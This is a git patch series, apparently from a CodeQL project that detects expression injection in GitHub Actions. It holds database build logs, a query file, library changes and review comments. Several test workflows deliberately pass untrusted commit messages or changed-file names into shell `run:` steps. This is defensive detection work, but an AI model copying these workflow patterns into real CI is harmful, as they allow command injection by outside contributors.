: [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). +[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:52] Plumbing command codeql database init completed. 
+[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... 
+[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 +[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. 
+[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) +[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) +[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) +[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) +[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) +[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) +[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) +[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:53] Merging 1 fragment for 'files'. +[2024-02-03 10:17:53] Merged 56 bytes for 'files'. +[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. +[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. +[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Saving string and id pools to disk. +[2024-02-03 10:17:54] Finished importing TRAP files. 
+[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. +[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) +[2024-02-03 10:17:54] String pool size: 2.05 MiB +[2024-02-03 10:17:54] ID pool size: 1.03 MiB +[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). +[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). +[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. +[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 +[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. 
+[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). +[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). +[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log new file mode 100644 index 000000000000..f410634a29ff --- /dev/null +++ b/ql/src/test-db/log/database-index-files-20240203.101752.962.log 
@@ -0,0 +1,21 @@ +[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Log file was started late. +[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json +[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" + ] +[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. +[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... 
+[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Terminating normally. 
diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..9c82ac3a64444a993e3a461dc000184a22d1e3a8 GIT binary patch literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I#> "$GITHUB_OUTPUT" + - id: sink + run: | + echo "echo ${{steps.no-step.outputs.foo}}" + + diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/no-flow2.yml new file mode 100644 index 000000000000..429d4650b60d --- /dev/null 
+++ b/ql/src/test/no-flow2.yml
@@ -0,0 +1,37 @@
+name: CI
+
+on:
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: 'foobarfoo'
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+
+
diff --git a/ql/src/test/simple1.yml b/ql/src/test/simple1.yml
new file mode 100644
index 000000000000..f61e763f1881
--- /dev/null
+++ b/ql/src/test/simple1.yml
@@ -0,0 +1,16 @@
+on: push
+
+jobs:
+ simple1:
+ runs-on: ubuntu-latest
+
+ steps:
+ - id: source
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event.head_commit.message }}
+ find: 'foo'
+ replace: ''
+ - id: sink
+ run: |
+ echo "${{steps.source.outputs.value}}"
diff --git a/ql/src/test/simple2.yml b/ql/src/test/simple2.yml
new file mode 100644
index 000000000000..f3d79b97bc2d
--- /dev/null
+++ b/ql/src/test/simple2.yml
@@ -0,0 +1,36 @@
+name: CI
+
+on:
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+
diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql
new file mode 100644
index 000000000000..f8d6e0c804b6
--- /dev/null
+++ b/ql/src/test/test.ql
@@ -0,0 +1,37 @@
+/**
+ * @name Expression injection in Actions
+ * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
+ * user to inject code into the GitHub action.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 9.3
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+
+private class ExpressionInjectionSink extends DataFlow::Node {
+ ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() +
+ " }}, which may be controlled by an external user."
diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml
new file mode 100644
index 000000000000..8f9cbf3b6440
--- /dev/null
+++ b/ql/src/test/test.yml
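Review bot: The message on the last two lines casts `sink.getNode().asExpr()` to `ExprAccessExpr`, while `ExpressionInjectionSink` accepts whatever `RunExpr.getScriptExpr()` returns; if that can be an expression other than an `ExprAccessExpr` (the AST classes are not visible here), the failed cast silently drops the whole result row instead of reporting the sink. Either restrict the sink class to `ExprAccessExpr` nodes so the two agree, or build the message with a fallback such as `sink.getNode().toString()` for the case where the cast has no value. The metadata is also inconsistent: `@name Expression injection in Actions` and `external/cwe/cwe-094` describe code injection, but `@id actions/command-injection` says command injection; one term should be used throughout. `MyConfig`/`MyFlow` are placeholder names; `ExpressionInjectionConfig`/`ExpressionInjectionFlow` would match the sink class.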
@@ -0,0 +1,35 @@
+on: push
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+
+ outputs:
+ job_output: ${{ steps.step2.outputs.test }}
+
+ steps:
+ - uses: actions/checkout@v4
+ - id: step0
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event.head_commit.message }}
+ find: 'foo'
+ replace: ''
+ - id: step1
+ env:
+ BODY: ${{ steps.step0.outputs.value}}
+ run: |
+ Write-Output "::set-output name=MSG::$ENV{BODY}"
+ - id: step2
+ run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT"
+
+ job2:
+ runs-on: ubuntu-latest
+
+ if: ${{ always() }}
+
+ needs: job1
+
+ steps:
+ - env:
+ run: echo ${{needs.job1.outputs.job_output}}
From 355ccf42ee38d6855833e3042ebca3de0f596147 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 5 Feb 2024 10:44:37 +0100
Subject: [PATCH 003/707] Do not compress local flow steps
Use `neverSkipPathGrap` to `any()` so no local flow steps get pruned and thrown away in order to compress the presented dataflow path.
---
.../internal/DataFlowImplSpecific.qll | 5 +++-
.../dataflow/internal/DataFlowPrivate.qll | 28 +++++--------------
.../Security/CWE-094/ExpressionInjection.ql | 1 +
3 files changed, 12 insertions(+), 22 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
index 4abb455b0ddc..2d3b9696ef65 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
@@ -6,6 +6,9 @@ private import codeql.dataflow.DataFlow
module ActionsDataFlow implements InputSig {
- import DataFlowPrivate
+ import DataFlowPrivate as Private
import DataFlowPublic
+ import Private
+
+ predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1;
}
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index b4abb3e8aa5f..8b57ea2436eb 100644
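Review bot: In step1's `run:` block, `$ENV{BODY}` is not a variable reference in bash (the default shell on `ubuntu-latest`), where it expands `$ENV` and leaves `{BODY}` literal, nor in PowerShell (`$env:BODY`); if the fixture is meant to model env-to-output flow, `echo "::set-output name=MSG::$BODY"` states that intent and is what a runner would actually execute (`Write-Output` is a PowerShell cmdlet). step2 already writes through `$GITHUB_OUTPUT`, so the file mixes the deprecated `::set-output` command with the current mechanism; if both are deliberately exercised, a comment above step1 saying so would stop the next reader from "fixing" it. In job2, `- env:` carries no value and parses as `env: null`; drop the key unless an empty env mapping is the point.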
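Review bot: The alias `predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1;` needs a comment saying why the `import Private` just above it is not sufficient; the likely reason is that `InputSig` gives this predicate a default body, and a defaulted signature member is only overridden by a declaration made directly in the implementing module, not by an imported one — worth confirming against the shared library. Suggest `// InputSig defaults this predicate; an import does not override a defaulted member, so alias it explicitly.` above the line. Having `import DataFlowPrivate as Private` and `import Private` separated by `import DataFlowPublic` also reads oddly; keeping the two `Private` lines adjacent makes the pattern easier to spot. The module header `module ActionsDataFlow implements InputSig {` is context in this hunk, so the change is confined to the module body.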
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -207,27 +207,6 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) {
)
}
-predicate test1(UsesExpr u, string f, JobStmt j) {
- u.getLocation().getFile().getBaseName() = "inter1.yml" and
- f = u.getId() and
- j = u.getJob()
-}
-
-predicate test2(StepOutputAccessExpr r, string f, JobStmt j) {
- r.getLocation().getFile().getBaseName() = "inter1.yml" and
- f = r.getStepId() and
- j = r.getJob()
-}
-
-predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) {
- r.getLocation().getFile().getBaseName() = "inter1.yml" and
- u.getLocation().getFile().getBaseName() = "inter1.yml" and
- u.getId() = r.getStepId() and
- u.getJob() = r.getJob() and
- // el SOAE has no mapping DF NODE
- n.asExpr() = r
-}
-
predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) {
// nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression
exists(Expression astFrom, JobOutputAccessExpr astTo |
@@ -310,3 +289,10 @@ predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { no
/** Extra data-flow steps needed for lambda flow analysis. */
predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() }
+
+/**
+ * Since our model is so simple, we dont want to compress the local flow steps.
+ * This compression is normally done to not show SSA steps, casts, etc.
+ */
+predicate neverSkipInPathGraph(Node node) { any() }
+
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index f8d6e0c804b6..4af1e2c286a6 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
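Review bot: The doc comment on the new `neverSkipInPathGraph` has a typo (`dont`) and does not state the consequence of `any()`: every node, including pure pass-through nodes, now appears in path explanations, so alert paths grow with the model; suggest replacing the three comment lines with `/** Never skip a node in path explanations. Our model has no SSA or cast steps to hide, so show every step; revisit if paths become too long. */`. The final `+` line adds a blank line at end of file, which `codeql query format` strips; drop it to avoid a format-only follow-up. The first hunk only removes the `test1`/`test2`/`test3` debugging predicates, nothing to raise there.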
@@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig {
predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+ //predicate neverSkip(DataFlow::Node node) { any() }
}
module MyFlow = TaintTracking::Global;
From 093b1a22110b2573befe6dd8c7662ce863038a34 Mon Sep 17 00:00:00 2001
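Review bot: The added `//predicate neverSkip(DataFlow::Node node) { any() }` is commented-out code inside `MyConfig`; this commit gets the behavior library-wide through `neverSkipInPathGraph` in `DataFlowPrivate.qll`, so the line only records that a per-query override (`ConfigSig::neverSkip`, if that is the counterpart here) was considered and rejected. Delete it, or replace it with a one-line note that points at the real setting, e.g. `// Path compression is disabled library-wide via neverSkipInPathGraph in DataFlowImplSpecific.qll.`. The enclosing module starts in the hunk header context and closes on the `}` line inside the hunk.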
